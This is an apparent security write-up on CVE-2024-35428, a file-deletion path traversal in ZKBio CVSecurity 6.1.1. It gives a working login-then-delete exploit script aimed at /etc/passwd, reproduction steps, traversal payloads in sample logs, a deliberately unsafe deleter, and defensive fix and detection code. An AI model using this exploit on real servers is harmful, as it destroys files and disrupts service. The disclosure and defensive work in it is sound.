A directory traversal vulnerability (CVE-2024-35428) has been disclosed in ZKTeco ZKBio CVSecurity version 6.1.1. An authenticated user can place path traversal sequences in the BaseMediaFile parameter and delete arbitrary local files on the server, which can lead to a Denial of Service (DoS) condition. Because the flaw is reachable only after login, any valid account on the system is enough to trigger it.

In this article, we look at the details of this vulnerability: a proof-of-concept exploit script, reference links to the original information sources, and the steps needed to reproduce the issue in a lab.

Vulnerability Details

The flaw lies in how ZKBio CVSecurity handles the "BaseMediaFile" parameter of its web application: the supplied value is used to locate a file on the server's file system without being confined to the intended media directory. An authenticated attacker can therefore include "../" sequences to traverse out of that directory and delete arbitrary local files, which disrupts the service when the deleted file is one the application or the operating system depends on.
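To make the mechanism concrete, here is an added Python example (it is not ZKBio CVSecurity code, which is not public; the directory layout, file names and function names are constructed for illustration). A file-deletion helper written in the vulnerable style sits beside a hardened version that canonicalises the requested path and refuses anything outside the media root; both are run against a traversal payload in a throwaway directory.

```python
import tempfile
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a requested name would resolve outside the media root."""


def delete_media_unsafe(root: Path, user_name: str) -> bool:
    """Vulnerable pattern: the user-controlled name is joined to the media
    root and deleted with no containment check, so '../x' escapes root and
    an absolute name replaces it entirely (Path('/a') / '/etc/x' == '/etc/x')."""
    target = root / user_name
    if target.is_file():
        target.unlink()
        return True
    return False


def resolve_inside(root: Path, user_name: str) -> Path:
    """Hardened resolution: canonicalise both paths (resolve() follows
    symlinks, so a link planted inside root cannot point outside it) and
    require the candidate to be a strict descendant of root."""
    root = root.resolve()
    candidate = (root / user_name).resolve()
    if candidate == root or root not in candidate.parents:
        raise PathTraversalError(f"refusing name outside media root: {user_name!r}")
    return candidate


def delete_media_safe(root: Path, user_name: str) -> bool:
    """Same operation, but only after resolve_inside() has accepted the name."""
    target = resolve_inside(root, user_name)
    if target.is_file():
        target.unlink()
        return True
    return False


def is_inside(root: str, user_name: str) -> bool:
    """Convenience check: does the hardened resolver accept this name?"""
    try:
        resolve_inside(Path(root), user_name)
        return True
    except PathTraversalError:
        return False


def demo() -> dict:
    """Constructed layout: <tmp>/media/logo.png is legitimate media and
    <tmp>/secret/config.ini sits one level outside the media root.
    Runs both deleters against a traversal payload and reports the outcome."""
    base = Path(tempfile.mkdtemp(prefix="traversal-demo-"))
    media = base / "media"
    media.mkdir()
    (media / "logo.png").write_bytes(b"\x89PNG constructed sample")
    victim = base / "secret" / "config.ini"
    victim.parent.mkdir()
    victim.write_text("db_password=constructed\n")

    payload = "../secret/config.ini"
    result = {"unsafe_deleted": delete_media_unsafe(media, payload),
              "victim_survives_unsafe": victim.exists()}

    victim.write_text("db_password=constructed\n")  # restore for the second run
    try:
        delete_media_safe(media, payload)
        result["safe_rejected"] = False
    except PathTraversalError:
        result["safe_rejected"] = True
    result["victim_survives_safe"] = victim.exists()
    result["legit_deleted"] = delete_media_safe(media, "logo.png")  # still works
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The containment check compares resolved paths rather than looking for the literal string "..", because percent-encoded, backslash-separated and symlink-based variants all collapse to the same canonical location once resolved. Applying the same check to every operation that turns a request parameter into a file path (read, write and delete) is the fix; blocking "../" at a proxy is only a mitigation.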

Code Snippet

The following Python proof-of-concept script exercises the directory traversal vulnerability (CVE-2024-35428) in ZKTeco ZKBio CVSecurity 6.1.1. It logs in with a valid account, then sends a traversal payload to the media file deletion endpoint:

import requests

target_url = "http://192.168.1.101/"  # Replace with the target server URL (keep the trailing slash)
username = "attacker_username"        # Any valid account works: the flaw is post-authentication
password = "attacker_password"

# Log in and obtain the session token. The endpoint and field names are the ones used in
# this write-up; confirm them against the login request the target's web UI actually sends.
login_url = target_url + "cSec/Login/checklogin"
session = requests.Session()
response = session.post(login_url, data={"username": username, "password": password})
response.raise_for_status()
session_token = response.json().get("token")
if not session_token:
    raise SystemExit(f"Login failed or no token in response: {response.text[:200]}")

# Perform the directory traversal: the file name is joined to the media directory without a
# containment check, so "../" sequences walk out of it and reach any file the service can delete.
delete_url = target_url + "cSec/BaseMediaFile/deleteFile"
data = {
    "_token": session_token,
    "path": "../../../../../../../../../etc/passwd",  # Modify the path as per the target file
    "ftype": 1,
}
response_delete = session.post(delete_url, data=data)
response_delete.raise_for_status()

if response_delete.json().get("status") == 1:
    print("File deleted successfully!")
else:
    print("File deletion failed!")

Original References

1. CVE Details - CVE-2024-35428
2. ZKTeco Official Website

Steps to Reproduce

1. Set up a ZKTeco ZKBio CVSecurity 6.1.1 server for testing purposes in an isolated lab, since the script deletes files on the target.

2. Obtain valid credentials for a user account on the server. The vulnerability is only reachable after authentication, so a working username and password are required to send the malicious request.

3. Replace the 'target_url' variable in the code snippet with the URL of the target server.

4. Modify the 'path' parameter in the data dictionary as required, traversing to the desired location on the server's file system.

5. Execute the Python script.

Upon successful execution, the targeted file is deleted from the server; deleting a file the application or operating system depends on causes service disruption.
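As an added example of the defender's side (it is not from the original page or from the vendor): a small Python scanner that normalises request parameter values, including percent-encoded and double-encoded variants and backslash separators, and flags traversal attempts. The log records are constructed JSON lines from a hypothetical reverse proxy that logs the form parameters of POST requests, since a standard access log would not show the request body; the endpoint name is the one used in the script above, and the addresses and usernames are invented.

```python
import json
import re
from typing import Optional
from urllib.parse import unquote

# A '..' segment bounded by a separator or the string boundary, checked after
# backslashes have been folded to '/', so both '../x' and '..\x' are caught.
_DOTDOT = re.compile(r"(?:^|/)\.\.(?:/|$)")
_ABSOLUTE = re.compile(r"^(?:/|[A-Za-z]:/)")


def normalise_param(value: str, rounds: int = 3) -> str:
    """Strip up to `rounds` layers of percent-encoding (catches %2e%2e%2f and
    double-encoded %252e%252e%252f) and fold backslashes to forward slashes."""
    decoded = value
    for _ in range(rounds):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    return decoded.replace("\\", "/")


def traversal_reason(value: str) -> Optional[str]:
    """Why a parameter value looks like a traversal attempt, or None if it does not."""
    norm = normalise_param(value)
    if _DOTDOT.search(norm):
        return "dot-dot segment"
    if _ABSOLUTE.match(norm):
        return "absolute path"
    return None


# Constructed log records (JSON lines) from a hypothetical reverse proxy that logs
# POST form parameters. Addresses, timestamps and usernames are invented.
SAMPLE_LOG = """\
{"ts":"2024-06-01T10:00:01Z","src":"10.0.0.5","user":"admin","method":"POST","uri":"/cSec/BaseMediaFile/deleteFile","params":{"path":"logo_2024.png","ftype":"1"}}
{"ts":"2024-06-01T10:00:07Z","src":"10.0.0.77","user":"guest1","method":"POST","uri":"/cSec/BaseMediaFile/deleteFile","params":{"path":"../../../../etc/passwd","ftype":"1"}}
{"ts":"2024-06-01T10:00:09Z","src":"10.0.0.77","user":"guest1","method":"POST","uri":"/cSec/BaseMediaFile/deleteFile","params":{"path":"%2e%2e%2f%2e%2e%2fwindows%2fwin.ini","ftype":"1"}}
{"ts":"2024-06-01T10:00:12Z","src":"10.0.0.77","user":"guest1","method":"POST","uri":"/cSec/BaseMediaFile/deleteFile","params":{"path":"..%255c..%255cboot.ini","ftype":"1"}}
{"ts":"2024-06-01T10:00:20Z","src":"10.0.0.5","user":"admin","method":"GET","uri":"/cSec/BaseMediaFile/list","params":{"dir":"photos/2024..05"}}
"""


def scan_log(text: str) -> list:
    """Return one finding per parameter value that looks like a traversal attempt."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        for name, value in rec.get("params", {}).items():
            reason = traversal_reason(value)
            if reason:
                findings.append({
                    "ts": rec["ts"], "src": rec["src"], "user": rec.get("user"),
                    "uri": rec["uri"], "param": name, "raw": value,
                    "decoded": normalise_param(value), "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} user={f['user']} {f['uri']} "
              f"{f['param']}={f['raw']!r} -> {f['decoded']!r} ({f['reason']})")
```

The scanner deliberately decodes more than once: a proxy or the application may decode a parameter a second time, so "..%255c" reaches the file handler as "..\". A file name such as "2024..05" is not flagged because the dots are not a whole path segment. In practice the findings would feed an alert keyed on source address and account, since a single authenticated user sending several variants in quick succession is the pattern the proof-of-concept above produces.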

Conclusion

The CVE-2024-35428 vulnerability in ZKTeco ZKBio CVSecurity 6.1.1 is a serious concern given how easily it can be exploited: a single HTTP request from any authenticated account is enough to delete a file of the attacker's choosing. Organizations running the affected version should apply the vendor's fix or update to a corrected release, limit network access to the management interface in the meantime, review who holds accounts on the system, and watch request logs for traversal sequences aimed at the media file endpoints. Security researchers should remain vigilant and continue to examine commonly deployed software, such as access control and video management platforms, for this class of flaw.

Timeline

Published on: 05/30/2024 17:15:34 UTC
Last modified on: 07/18/2024 16:52:56 UTC